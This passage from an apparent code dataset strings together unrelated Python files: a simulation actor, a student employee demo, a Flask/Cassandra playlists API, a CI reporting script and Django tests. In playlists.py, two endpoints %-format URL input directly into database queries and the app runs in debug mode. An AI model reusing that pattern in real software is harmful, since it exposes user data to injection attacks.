self.log.info(f'Changing purpose to #{purpose.value}')\n super().re_purpose(purpose)\n\n def _route_to(self, route):\n self.log.debug(f'Routing to {id(route[-1])}')\n self.current_route = route\n\n def _route_with_purpose(self, location, purpose): # TODO: Refactor - abstract out to geolocated + purposeful actor\n self._route_to(CityMap.route(self.location, location))\n self.re_purpose(purpose)\n\n @mass_process\n def _process_notifications(self, notifications):\n def process_one(notification):\n if notification.type == AmbulanceHeadquarterNotification.DISPATCH_TO_EVENT:\n event_location = notification.payload['location']\n self._route_with_purpose(event_location, AmbulancePurpose.ROUTING_TO_ASSIST)\n\n return notifications, process_one\n\n def _take_action(self):\n {\n AmbulancePurpose.IDLE: lambda: None,\n AmbulancePurpose.ROUTING_TO_ASSIST: self._routing_actions,\n AmbulancePurpose.ASSISTING: self._assisting_actions,\n AmbulancePurpose.ROUTING_TO_HQ: self._routing_actions,\n }[self.purpose]()\n\n def move_and_join_event(self):\n try:\n self.move_forward(self.current_route)\n except RoutingError:\n self.try_join_event()\n\n def try_join_event(self):\n intervention_event = self.location.intervention_event\n if intervention_event:\n self.intervention_event = intervention_event\n intervention_event.join(self)\n self.re_purpose(AmbulancePurpose.ASSISTING)\n self.log.info(f'Joined intervention event {id(intervention_event)} to assist')\n else:\n self._route_with_purpose(self.ambulance_hq, AmbulancePurpose.ROUTING_TO_HQ)\n\n def _routing_actions(self):\n try:\n self.move_and_join_event()\n except AmbulanceError as a_err: # This piece is used like a safeguard for routing to hq\n if self.purpose is AmbulancePurpose.ROUTING_TO_HQ:\n self.re_purpose(AmbulancePurpose.IDLE)\n else:\n raise a_err\n\n def _assisting_actions(self):\n if self.intervention_event.active: # If the actions grow, make a similar inactive guard as in policeman\n self.send_notification_with_location(AmbulanceNotification.ASSISTING)\n self.intervention_event.mitigate(self)\n else:\n self._route_with_purpose(self.ambulance_hq, AmbulancePurpose.ROUTING_TO_HQ)\n self.send_notification(AmbulanceNotification.RETURNING_TO_HQ)\n\n def send_notification(self, notification_type, payload=None):\n self.log.debug(f'Sending notification {notification_type.value}, payload: {payload}')\n notifications.send(\n type=notification_type,\n actor=self,\n payload=payload\n )\n\n def send_notification_with_location(self, notification_type):\n self.send_notification(\n notification_type=notification_type, payload={'location': self.location}\n )\n","sub_path":"smart_intervention/models/actors/ambulance/ambulance.py","file_name":"ambulance.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"564974167","text":"# This program tests the Employee class by generating 3 objects and\n# displaying their contained information\n\nfrom random import randint\n# import the employee class\nimport EmployeeClass\n\ndef main():\n # get the list of objects to display\n employees = get_employees(3)\n # display the information\n display_employees(employees)\n\n# define the get employees function\ndef get_employees(p_amount):\n # Create and empty list to store the objects generated\n result_list = []\n # Prompt for p_amount objects information\n for emp in range(1, p_amount + 1):\n print(f'\\nEmployee entry {emp}:')\n name = input('Enter the employee\\'s name: ').title()\n department = input(f'What department is {name} assigned?: ')\n title = input(f'{name}\\'s work title?: ')\n # grab a randomly generated 5-digit employee id\n id_num = randint(10000, 99999)\n\n # add the data to an emplyee object\n employee = EmployeeClass.Employee(name, id_num, department, title)\n # add the object to the returning list\n result_list.append(employee)\n # return the list of employee objects\n return result_list\n\n# define the display employees\ndef display_employees(p_list):\n # iterate through the list\n for employee in p_list:\n # Display the employee's information\n print(f'\\nEmployee ID: {employee.get_id_num()}')\n print(f'\\tName: {employee.get_name()}')\n print(f'\\tTitle: {employee.get_title()}')\n print(f'\\tDepartment: {employee.get_department()}')\n\n# call the main function\nmain()\n\n","sub_path":"studentCode/employee.py","file_name":"employee.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"613667919","text":"import sys\nimport flask_api\nimport datetime\nfrom flask import request, g, jsonify, Response\nfrom flask_api import FlaskAPI,status, exceptions\nfrom cassandra.cluster import Cluster\n\napp = FlaskAPI(__name__) \n\n@app.route('/', methods=['GET'])\ndef home():\n return \"Playlists API\"\n\n\n@app.route(\"/playlists\",methods=['POST'])\ndef create_playlists():\n\tmandatory_fields = ['playlist_title','user_name','track_title']\n\n\tif not all([field in request.data for field in mandatory_fields]):\n \traise exceptions.ParseError()\n\n\tplaylist_title = request.data.get('playlist_title','')\n\tuser_name = request.data.get('user_name','')\n\ttrack_title = request.data.get('track_title','')\n\tdescription = request.data.get('description','')\n\n\tcluster = Cluster(['172.17.0.2'])\n\tsession = cluster.connect('music')\n\tcurDate = datetime.datetime.now()\n\n\trows = session.execute(\"\"\"Select id from musicData where track_title = %(track_title)s ALLOW FILTERING;\"\"\",{'track_title':track_title})\n\n\tid = None\n\tfor row in rows:\n\t\tid = row.id\n\n\tif id is None:\n\t\treturn 'track_title ID Not found'\n\telse:\n\t\trows = session.execute(\"\"\"Select user_name,playlist_title, album_title, track_artist, track_length, media_url, album_url from musicData where id = %(id)s ALLOW FILTERING;\"\"\",{'id':id})\n\n\t\tu_name = None\n\t\tp_title = None\n\t\tfor row in rows:\n\t\t\tu_name = row.user_name\n\t\t\tp_title = row.playlist_title\n\t\t\ta_title = row.album_title\n\t\t\tt_artist = row.track_artist\n\t\t\tt_length = row.track_length\n\t\t\tm_url = row.media_url\n\t\t\ta_url = row.album_url\n\n\t\tif u_name is None:\n\t\t\tsession.execute(\"\"\"UPDATE musicData\n\t\t\tset playlist_title = %(playlist_title)s,\n\t\t\tuser_name = %(user_name)s,\n\t\t\tdescription = %(description)s,\n\t\t\tmodifieddate = %(modifieddate)s\n\t\t\twhere Id = %(id)s\"\"\",\n\t\t\t{'playlist_title': playlist_title, 'user_name': user_name, 'description': description, 'id':id, 'modifieddate': str(curDate)})\n\t\telse:\n\t\t\trows = session.execute(\"Select max(Id) as id from musicData\")\n\n\t\t\tfor row in rows:\n\t\t\t\t\tnew_id = row.id\n\n\t\t\tif new_id is None:\n\t\t\t\tnew_id = 1\n\t\t\telse:\n\t\t\t\tnew_id = new_id + 1\n\n\t\t\tif(u_name == user_name):\n\t\t\t\tif(p_title == playlist_title):\t\t\t\t\n\t\t\t\t\treturn 'same user_name and same playlist already exists!!!'\n\t\t\t\telse:\n\t\t\t\t\tsession.execute(\"\"\"INSERT into musicData (track_title, album_title, track_artist, track_length, media_url, album_url, playlist_title, user_name, description, id, createddate) \n\t\t\t\t\tvalues (%(track_title)s, %(album_title)s, %(track_artist)s, %(track_length)s, %(media_url)s, %(album_url)s, %(playlist_title)s,%(user_name)s,%(description)s, %(new_id)s, %(createddate)s)\"\"\",\n\t\t\t\t\t{'track_title': track_title, 'album_title': a_title, 'track_artist': t_artist, 'track_length':t_length, 'media_url':m_url, 'album_url':a_url, 'playlist_title': playlist_title, 'user_name': user_name, 'description': description, 'new_id':new_id, 'createddate': str(curDate)})\n\t\t\telse:\n\t\n\t\t\t\tsession.execute(\"\"\"INSERT into musicData (track_title, album_title, track_artist, track_length, media_url, album_url, playlist_title, user_name, description, id, createddate) \n\t\t\t\tvalues (%(track_title)s, %(album_title)s, %(track_artist)s, %(track_length)s, %(media_url)s, %(album_url)s, %(playlist_title)s,%(user_name)s,%(description)s, %(new_id)s, %(createddate)s)\"\"\",\n\t\t\t\t{'track_title': track_title, 'album_title': a_title, 'track_artist': t_artist, 'track_length':t_length, 'media_url':m_url, 'album_url':a_url, 'playlist_title': playlist_title, 'user_name': user_name, 'description': description, 'new_id':new_id,'createddate': str(curDate)})\n\n\n\tresponse = Response(status=201)\n\tresponse.headers['location'] = '/playlistsbyuser/'+user_name\n\tresponse.headers['status'] = '201 Created'\n\n\treturn response, status.HTTP_201_CREATED\n\n\n#To get particular plalist info\n@app.route(\"/playlists/<playlist_id>\",methods=['GET'])\ndef get_playlist(playlist_id):\n\ttry:\n\t\tcluster = Cluster(['172.17.0.2'])\n\t\tsession = cluster.connect('music')\n\t\tcurDate = datetime.datetime.now()\n\n\t\tresult = session.execute(\"\"\"select user_name,playlist_title,track_id from musicData where playlist_id = %(playlist_id)s ALLOW FILTERING;\"\"\", {'playlist_id':playlist_id})\n\t\t\n\texcept Exception as e:\n \treturn { 'error': str(e) }, status.HTTP_404_NOT_FOUND\n \t\n\tif result is None:\n\t\treturn { 'error': str(e) }, status.HTTP_404_NOT_FOUND\n\t\n\treturn jsonify(list(result)), status.HTTP_200_OK\n\n\n@app.route(\"/playlists\",methods=['GET'])\ndef get_all_playlists():\n\n\tcluster = Cluster(['172.17.0.2'])\n\tsession = cluster.connect('music')\n\tresult = session.execute(\"select * from musicData\")\n\n\tif result is None:\n\t\tresp = Response(status=404, mimetype='application/json')\n\t\treturn resp\n\n\treturn jsonify(list(result))\n\n\n@app.route(\"/playlistsbytitle/<playlist_title>\",methods=['GET'])\ndef get_playlistByTitle(playlist_title):\n\n\tcluster = Cluster(['172.17.0.2'])\n\tsession = cluster.connect('music')\n\n\tresult = session.execute(\"select user_name,playlist_title,createddate,track_title from musicData where playlist_title ='%s' ALLOW FILTERING\" %playlist_title)\n\n\tif result is None:\n\t\tresp = Response(status=404, mimetype='application/json')\n\t\treturn resp\n\n\treturn jsonify(list(result))\n\n\n@app.route(\"/playlistsbyname/<user_name>\",methods=['GET'])\ndef get_playlistByName(user_name):\n\n\tcluster = Cluster(['172.17.0.2'])\n\tsession = cluster.connect('music')\n\n\tresult = session.execute(\"select user_name,playlist_title,createddate from musicData where user_name ='%s' ALLOW FILTERING\" %user_name)\n\n\tif result is None:\n\t\tresp = Response(status=404, mimetype='application/json')\n\t\treturn resp\n\n\treturn jsonify(list(result))\n\n@app.route(\"/playlists/<playlist_title>\",methods=['DELETE'])\ndef delete_playlist(playlist_title):\n\t\n\tcluster = Cluster(['172.17.0.2'])\n\tsession = cluster.connect('music')\n\trows = session.execute(\"\"\"Select id from musicData where playlist_title = %(playlist_title)s ALLOW FILTERING;\"\"\",{'playlist_title':playlist_title})\n\n\tidNo = None\n\tfor row in rows:\n\t\tidNo = row.id\n\n\tif idNo is None:\n\t\treturn 'playlist_title ID Not found'\n\n\tsession.execute(\"delete from musicData where Id = %(idNo)s\",{'idNo':idNo})\n\n\tresp = Response(status=200, mimetype='application/json')\n \n\treturn resp\n\n\nif __name__ == \"__main__\":\n\tapp.run(debug=True)\n\t\n","sub_path":"playlists.py","file_name":"playlists.py","file_ext":"py","file_size_in_byte":6199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"232414041","text":"#\n# The MIT License\n#\n# Copyright 2020 Vector Informatik, GmbH.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n\nimport os, subprocess,argparse, glob, sys\n\nfrom managewait import ManageWait\nfrom parse_console_for_cbt import ParseConsoleForCBT\nimport generate_results \nimport cobertura\n\n\nclass AzureExecute(object):\n def __init__(self, ManageProject, useCILicense, useCBT, level, environment, verbose, print_exc, timing, buildlog):\n\n # setup default values\n self.print_exc = print_exc\n self.timing = timing\n\n self.verbose = verbose\n self.FullMP = ManageProject\n self.mpName = os.path.basename(ManageProject)[:-4]\n\n if useCILicense:\n self.useCI = \" --ci \"\n else:\n self.useCI = \"\"\n\n if useCBT:\n self.useCBT = \" --incremental \"\n else:\n self.useCBT = \"\"\n\n self.build_log = None\n \n self.useLevelEnv = False\n self.environment = None\n self.level = None\n self.compiler = \"\"\n self.testsuite = \"\"\n self.reportsName = \"\"\n self.env_option = \"\"\n self.level_option = \"\"\n self.build_log_name = buildlog\n\n # if a manage level was specified...\n if level: \n self.useLevelEnv = True\n self.level = level\n \n # try level being Compiler/TestSuite\n try:\n self.compiler, self.testsuite = level.split(\"/\")\n self.reportsName = \"_\" + self.compiler + \"_\" + self.testsuite\n except:\n # just use the compiler name\n self.compiler = level\n self.reportsName = \"_\" + self.compiler\n \n self.level_option = \"--level \" + level + \" \"\n\n # if an environment was specified\n if environment:\n # afix the proper settings for commands later and report names\n self.useLevelEnv = True\n self.environment = environment\n self.env_option = \"--environment \" + environment + \" \"\n self.reportsName += \"_\" + self.environment\n \n if self.useLevelEnv:\n self.build_log_name = \"build\" + self.reportsName + \".log\" \n\n self.manageWait = ManageWait(self.verbose, \"\", 30, 1, self.FullMP, self.useCI)\n\n def runMetrics(self):\n # read in build log for CBT analysis \n if os.path.exists(self.build_log_name):\n print (\"Using build log: \" + self.build_log_name)\n self.build_log = open(self.build_log_name,\"r\").read()\n \n else:\n print (\"Build log not found. Trying to generate complete log from individual build logs\")\n self.build_log = \"\"\n for file in glob.glob(\"build*.log\"):\n if self.verbose: print(file)\n self.build_log += open(file,\"r\").read() + \"\\n\" \n \n cbt = ParseConsoleForCBT(args.verbose)\n cbtDict = None\n \n # don't show skipped tests as Azure shows them as \"Other\" instead of skipped\n# if self.build_log:\n# cbtDict = cbt.parse(self.build_log)\n# else:\n# print(\"Could not find any build logs...skipping CBT Analysis\")\n \n generate_results.verbose = self.verbose\n generate_results.print_exc = self.print_exc\n generate_results.timing = self.timing\n generate_results.buildReports(self.FullMP,self.level,self.environment, True, self.timing, cbtDict)\n\n for file in glob.glob(\"xml_data/coverage_results_*.*\"):\n try:\n os.remove(file);\n except:\n print(\"Error removing file after failed to remove directory: \" + file)\n cobertura.azure = True\n cobertura.generateCoverageResults(self.FullMP)\n\n def runReports(self):\n self.manageWait.exec_manage_command (\"--create-report=aggregate --output=\" + self.mpName + \"_aggregate_report.html\")\n self.manageWait.exec_manage_command (\"--create-report=metrics --output=\" + self.mpName + \"_metrics_report.html\")\n self.manageWait.exec_manage_command (\"--create-report=environment --output=\" + self.mpName + \"_environment_report.html\")\n\n def runExec(self):\n\n self.manageWait.exec_manage_command (\"--status\")\n self.manageWait.exec_manage_command (\"--force --release-locks\")\n self.manageWait.exec_manage_command (\"--config VCAST_CUSTOM_REPORT_FORMAT=HTML\")\n \n if self.useLevelEnv:\n output = \"--output \" + self.mpName + self.reportsName + \"_rebuild.html\"\n else:\n output = \"\"\n \n self.build_log = self.manageWait.exec_manage_command (\"--build-execute \" + self.useCBT + self.level_option + self.env_option + output )\n open(self.build_log_name,\"w\").write(self.build_log)\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('ManageProject', help='Manager Project Name')\n parser.add_argument('--ci', help='Use CI Licenses', action=\"store_true\", default = False)\n parser.add_argument('--incremental', help='Use CBT', action=\"store_true\", default = False)\n parser.add_argument('--execute', help='Exeuction the VectorCAST Project', action=\"store_true\", default = False)\n parser.add_argument('--metrics', help='Run the metrics for VectorCAST Project', action=\"store_true\", default = False)\n parser.add_argument('--reports', help='Run the reports for VectorCAST Project', action=\"store_true\", default = False)\n parser.add_argument('--print_exc', help='Prints exceptions', action=\"store_true\", default = False)\n parser.add_argument('--buildlog', help='VectorCAST Build Log', default = \"complete_build.log\")\n parser.add_argument('--timing', help='Prints timing information for metrics generation', action=\"store_true\", default = False)\n parser.add_argument('-v', '--verbose', help='Enable verbose output', action=\"store_true\", default = False)\n parser.add_argument('-l', '--level', help='Environment Name if only doing single environment. Should be in the form of level/env')\n parser.add_argument('-e', '--environment', help='Environment Name if only doing single environment. Should be in the form of level/env')\n\n args = parser.parse_args()\n\n\n if not os.path.isfile(args.ManageProject):\n print (\"Manage project (.vcm file) provided does not exist: \" + args.ManageProject)\n print (\"exiting...\")\n sys.exit(-1)\n\n glExec = AzureExecute(args.ManageProject, args.ci, args.incremental, args.level, args.environment, args.verbose, args.print_exc, args.timing, args.buildlog)\n\n if args.execute:\n glExec.runExec()\n \n if args.metrics:\n glExec.runMetrics()\n\n if args.reports:\n glExec.runReports()\n","sub_path":"azure/vc_scripts/azure_exec.py","file_name":"azure_exec.py","file_ext":"py","file_size_in_byte":7842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"168188957","text":"import time\n\nfrom gtda.homology import FlagserPersistence\nimport math\n\nfrom Configuration.Constants import PersistenceComputation as RipserConstants\nfrom model.homology.PersistenceDiagram import PersistenceDiagram\nfrom model.homology.PersistenceDiagramPoint import PersistenceDiagramPoint\n\nDEFAULT_UPPER_DIM = RipserConstants.DEFAULT_UPPER_DIM\n\n\ndef compute_persistence_diagram(distance_matrix,\n upper_dim=DEFAULT_UPPER_DIM):\n flagser_computer = FlagserPersistence(homology_dimensions=list(range(upper_dim+1)), directed=False,\n reduced_homology=False, max_entries=1000)\n print(\"Starting computation PDS\")\n start = time.time()\n flagser_diagram = flagser_computer.fit_transform([distance_matrix.array])[0]\n end = time.time()\n print(\"Finished in {}s\".format(end - start))\n diagram = PersistenceDiagram()\n for point in flagser_diagram:\n if math.isclose(point[0], point[1]):\n diagram.add_point(PersistenceDiagramPoint(int(point[2]), point[0], point[1]))\n return diagram\n","sub_path":"NeurIPSSoftware/adapters/FlagserAdapter.py","file_name":"FlagserAdapter.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"540077056","text":"import json\n\nfrom django.conf import settings\nfrom django.utils.encoding import iri_to_uri\n\nfrom mock import patch\nfrom nose.tools import eq_\nfrom pyquery import PyQuery as pq\nimport waffle\n\nimport amo\nfrom amo.helpers import absolutify, numberfmt, page_title\nimport amo.tests\nfrom amo.urlresolvers import reverse\nfrom amo.utils import urlparams\nfrom addons.models import Addon, AddonCategory, AddonUser, Category\nfrom addons.tests.test_views import add_addon_author, test_hovercards\nfrom browse.tests import test_listing_sort, test_default_sort, TestMobileHeader\nfrom market.models import AddonPremium, Price\nfrom sharing import get_service\nfrom tags.models import AddonTag, Tag\nfrom translations.helpers import truncate\nfrom users.models import UserProfile\nfrom versions.models import Version\nfrom webapps.models import Webapp\n\n\nclass WebappTest(amo.tests.TestCase):\n\n def setUp(self):\n self.webapp = Webapp.objects.create(name='woo', app_slug='yeah',\n weekly_downloads=9999, status=amo.STATUS_PUBLIC)\n self.webapp._current_version = (Version.objects\n .create(addon=self.webapp))\n self.webapp.save()\n\n self.webapp_url = self.url = self.webapp.get_url_path()\n\n\nclass PaidAppMixin(object):\n\n def setup_paid(self, type_=None):\n type_ = amo.ADDON_PREMIUM if type_ is None else type_\n self.free = [\n Webapp.objects.get(id=337141),\n amo.tests.addon_factory(type=amo.ADDON_WEBAPP),\n ]\n\n self.paid = []\n for x in xrange(1, 3):\n price = Price.objects.create(price=x)\n addon = amo.tests.addon_factory(type=amo.ADDON_WEBAPP,\n weekly_downloads=x * 100)\n AddonPremium.objects.create(price=price, addon=addon)\n addon.update(premium_type=type_)\n self.paid.append(addon)\n\n # For measure add some disabled free apps ...\n amo.tests.addon_factory(type=amo.ADDON_WEBAPP, disabled_by_user=True)\n amo.tests.addon_factory(type=amo.ADDON_WEBAPP, status=amo.STATUS_NULL)\n\n # ... and some disabled paid apps.\n addon = amo.tests.addon_factory(type=amo.ADDON_WEBAPP,\n disabled_by_user=True, premium_type=amo.ADDON_PREMIUM)\n AddonPremium.objects.create(price=price, addon=addon)\n addon = amo.tests.addon_factory(type=amo.ADDON_WEBAPP,\n status=amo.STATUS_NULL, premium_type=amo.ADDON_PREMIUM)\n AddonPremium.objects.create(price=price, addon=addon)\n\n self.both = sorted(self.free + self.paid,\n key=lambda x: x.weekly_downloads, reverse=True)\n self.free = sorted(self.free, key=lambda x: x.weekly_downloads,\n reverse=True)\n self.paid = sorted(self.paid, key=lambda x: x.weekly_downloads,\n reverse=True)\n\n\nclass TestPremium(PaidAppMixin, amo.tests.TestCase):\n fixtures = ['base/apps', 'base/users', 'webapps/337141-steamcube']\n\n def setUp(self):\n waffle.models.Switch.objects.create(name='marketplace', active=True)\n self.url = reverse('apps.home')\n self.user = UserProfile.objects.get(email='regular@mozilla.com')\n self.setup_paid()\n eq_(self.free, list(Webapp.objects.top_free()))\n eq_(self.paid, list(Webapp.objects.top_paid()))\n\n\nclass TestHome(TestPremium):\n\n def test_free(self):\n r = self.client.get(self.url)\n eq_(r.status_code, 200)\n doc = pq(r.content)\n eq_(list(r.context['free']), self.free)\n for idx, element in enumerate(doc('#top-free .item')):\n item = pq(element)\n webapp = self.free[idx]\n eq_(item.find('.price').text(), 'FREE')\n eq_(item.find('.downloads').split()[0],\n numberfmt(webapp.weekly_downloads))\n\n def test_paid(self):\n r = self.client.get(self.url)\n eq_(r.status_code, 200)\n doc = pq(r.content)\n eq_(list(r.context['paid']), self.paid)\n for idx, element in enumerate(doc('#top-paid .item')):\n item = pq(element)\n webapp = self.paid[idx]\n eq_(item.find('.price').text(), webapp.premium.get_price_locale())\n eq_(item.find('.downloads').split()[0],\n numberfmt(webapp.weekly_downloads))\n\n\nclass TestLayout(WebappTest):\n\n def setUp(self):\n super(TestLayout, self).setUp()\n self.url = reverse('apps.home')\n\n def test_header(self):\n for url in (self.url, reverse('apps.list')):\n r = self.client.get(url)\n eq_(r.status_code, 200)\n doc = pq(r.content)\n eq_(doc('h1.site-title').text(), 'Apps')\n eq_(doc('#site-nav.app-nav').length, 1)\n eq_(doc('#search-q').attr('placeholder'), 'search for apps')\n\n def test_header_links(self):\n browse = reverse('apps.list')\n cat = Category.objects.create(name='Games', slug='games',\n type=amo.ADDON_WEBAPP)\n expected = [\n ('Most Popular', urlparams(browse, sort='downloads')),\n ('Top Free', urlparams(browse, sort='free')),\n ('Top Paid', urlparams(browse, sort='paid')),\n ('Highest Rated', urlparams(browse, sort='rating')),\n ('Games', cat.get_url_path()),\n ]\n\n r = self.client.get(self.url)\n doc = pq(r.content)('#site-nav')\n\n amo.tests.check_links(expected, doc('#explore-cats li a'))\n eq_(doc('#my-apps a').attr('href'), reverse('users.purchases'))\n eq_(doc('#submit-app a').attr('href'), reverse('devhub.submit_apps.1'))\n\n @patch.object(settings, 'READ_ONLY', False)\n def test_balloons_no_readonly(self):\n response = self.client.get(self.url)\n doc = pq(response.content)\n eq_(doc('#site-notice').length, 0)\n eq_(doc('#site-nonfx').length, 0)\n eq_(doc('#site-welcome').length, 0)\n eq_(doc('#site-nojs-apps').length, 1)\n eq_(doc('#appruntime-pitch').length, 1)\n\n @patch.object(settings, 'READ_ONLY', True)\n def test_balloons_readonly(self):\n response = self.client.get(self.url)\n doc = pq(response.content)\n eq_(doc('#site-notice').length, 1)\n eq_(doc('#site-nonfx').length, 0)\n eq_(doc('#site-welcome').length, 0)\n eq_(doc('#site-nojs-apps').length, 1)\n eq_(doc('#appruntime-pitch').length, 1)\n\n def test_footer(self):\n doc = pq(self.client.get(self.url).content)\n eq_(doc('#social-footer').length, 0)\n eq_(doc('#copyright').length, 1)\n eq_(doc('#footer-links .mobile-link').length, 1)\n\n def test_search_url(self):\n for url in (self.url, self.webapp_url):\n response = self.client.get(url)\n doc = pq(response.content)\n eq_(doc('#search').attr('action'), '/en-US/apps/search/')\n\n\nclass TestListing(TestPremium):\n\n def setUp(self):\n super(TestListing, self).setUp()\n self.url = reverse('apps.list')\n\n def test_default_sort(self):\n test_default_sort(self, 'downloads', 'weekly_downloads')\n\n def test_free_sort(self):\n for app in test_listing_sort(self, 'free', 'weekly_downloads'):\n eq_(app.is_premium(), False)\n\n def test_paid_sort(self):\n for app in test_listing_sort(self, 'paid', 'weekly_downloads'):\n eq_(app.is_premium(), True)\n\n def test_price_sort(self):\n apps = test_listing_sort(self, 'price', None, reverse=False,\n sel_class='extra-opt')\n eq_(apps, list(Webapp.objects.listed()\n .order_by('addonpremium__price__price', 'id')))\n\n def test_rating_sort(self):\n test_listing_sort(self, 'rating', 'bayesian_rating')\n\n def test_newest_sort(self):\n test_listing_sort(self, 'created', 'created', sel_class='extra-opt')\n\n def test_name_sort(self):\n test_listing_sort(self, 'name', 'name', reverse=False,\n sel_class='extra-opt')\n\n\nclass TestDetail(WebappTest):\n fixtures = ['base/apps', 'base/addon_3615', 'base/addon_592', 'base/users']\n\n def get_pq(self):\n return pq(self.client.get(self.url).content.decode('utf-8'))\n\n def get_more_pq(self):\n more_url = self.webapp.get_url_path(more=True)\n return pq(self.client.get_ajax(more_url).content.decode('utf-8'))\n\n def test_title(self):\n eq_(self.get_pq()('title').text(), 'woo :: Apps Marketplace')\n\n def test_downloads(self):\n dls = self.get_pq()('#weekly-downloads')\n eq_(dls.find('a').length, 0)\n eq_(dls.text().split()[0], numberfmt(self.webapp.weekly_downloads))\n self.webapp.update(weekly_downloads=0)\n eq_(self.get_pq()('#weekly-downloads').length, 0)\n\n def test_more_url(self):\n eq_(self.get_pq()('#more-webpage').attr('data-more-url'),\n self.webapp.get_url_path(more=True))\n\n def test_headings(self):\n doc = self.get_pq()\n eq_(doc('#addon h1').text(), 'woo')\n eq_(doc('section.primary.island.c h2:first').text(), 'About this App')\n\n def test_add_review_link_aside(self):\n eq_(self.get_pq()('#reviews-link').attr('href'),\n reverse('apps.reviews.list', args=[self.webapp.app_slug]))\n\n def test_add_review_link_more(self):\n doc = self.get_more_pq()\n add_url = reverse('apps.reviews.add', args=[self.webapp.app_slug])\n eq_(doc.find('#reviews #add-first-review').attr('href'), add_url)\n eq_(doc.find('#reviews h3').remove('a').text(),\n 'This app has not yet been reviewed.')\n eq_(doc.find('#add-review').attr('href'), add_url)\n\n def test_other_apps(self):\n \"\"\"Ensure listed apps by the same author show up.\"\"\"\n # Create a new webapp.\n Addon.objects.get(id=592).update(type=amo.ADDON_WEBAPP)\n other = Webapp.objects.get(id=592)\n eq_(list(Webapp.objects.listed().exclude(id=self.webapp.id)), [other])\n\n author = add_addon_author(other, self.webapp)\n doc = self.get_more_pq()('#author-addons')\n eq_(doc.length, 1)\n\n by = doc.find('h2 a')\n eq_(by.attr('href'), author.get_url_path())\n eq_(by.text(), author.name)\n\n test_hovercards(self, doc, [other], src='dp-dl-othersby')\n\n def test_other_apps_no_addons(self):\n \"\"\"An add-on by the same author should not show up.\"\"\"\n other = Addon.objects.get(id=592)\n assert other.type != amo.ADDON_WEBAPP, 'Should not be an app.'\n\n add_addon_author(other, self.webapp)\n eq_(self.get_more_pq()('#author-addons').length, 0)\n\n def test_other_apps_no_unlisted(self):\n \"\"\"An unlisted app by the same author should not show up.\"\"\"\n Addon.objects.get(id=592).update(type=amo.ADDON_WEBAPP,\n disabled_by_user=True)\n other = Webapp.objects.get(id=592)\n\n add_addon_author(other, self.webapp)\n eq_(self.get_more_pq()('#author-addons').length, 0)\n\n def test_other_apps_by_others(self):\n \"\"\"Apps by different/no authors should not show up.\"\"\"\n author = UserProfile.objects.get(pk=999)\n AddonUser.objects.create(addon=self.webapp, user=author, listed=True)\n eq_(self.get_more_pq()('#author-addons').length, 0)\n\n def test_other_apps_none(self):\n eq_(self.get_more_pq()('#author-addons').length, 0)\n\n def test_deleted(self):\n self.webapp.update(status=amo.STATUS_DELETED)\n r = self.client.get(self.url)\n eq_(r.status_code, 404)\n\n def test_disabled_user_message(self):\n self.webapp.update(disabled_by_user=True)\n r = self.client.get(self.url)\n eq_(r.status_code, 404)\n doc = pq(r.content)\n h1 = doc('h1.addon')\n eq_(h1.length, 1)\n eq_(h1.find('a').length, 0)\n assert pq(r.content)('.removed'), (\n 'Expected message indicating that app was removed by its author')\n\n def test_disabled_status_message(self):\n self.webapp.update(status=amo.STATUS_DISABLED)\n r = self.client.get(self.url)\n eq_(r.status_code, 404)\n doc = pq(r.content)\n h1 = doc('h1.addon')\n eq_(h1.length, 1)\n eq_(h1.find('a').length, 0)\n assert pq(r.content)('.disabled'), (\n 'Expected message indicating that app was disabled by administrator')\n\n def test_categories(self):\n c = Category.objects.all()[0]\n c.application = None\n c.type = amo.ADDON_WEBAPP\n c.save()\n AddonCategory.objects.create(addon=self.webapp, category=c)\n links = self.get_more_pq()('#related ul:first').find('a')\n amo.tests.check_links([(unicode(c.name), c.get_url_path())], links)\n\n def test_tags(self):\n t = Tag.objects.create(tag_text='ballin')\n AddonTag.objects.create(tag=t, addon=self.webapp)\n links = self.get_more_pq()('#related #tagbox ul a')\n amo.tests.check_links([(t.tag_text, t.get_url_path())], links,\n verify=False)\n\n\nclass TestMobileListing(amo.tests.MobileTest, WebappTest):\n\n def get_res(self):\n r = self.client.get(reverse('apps.list'))\n eq_(r.status_code, 200)\n return r, pq(r.content)\n\n def test_listing(self):\n r, doc = self.get_res()\n self.assertTemplateUsed(r, 'browse/mobile/extensions.html')\n item = doc('.item')\n eq_(item.length, 1)\n eq_(item.find('h3').text(), 'woo')\n\n def test_listing_downloads(self):\n r, doc = self.get_res()\n dls = doc('.item').find('details .vital.downloads')\n eq_(dls.text().split()[0], numberfmt(self.webapp.weekly_downloads))\n\n\nclass TestMobileLayout(TestMobileHeader):\n fixtures = ['base/users']\n\n def setUp(self):\n self.url = reverse('apps.list')\n\n @patch.object(settings, 'APP_PREVIEW', True)\n def test_no_language_selector(self):\n # When Marketplace is localized, remove this test.\n r = self.client.get(self.url)\n 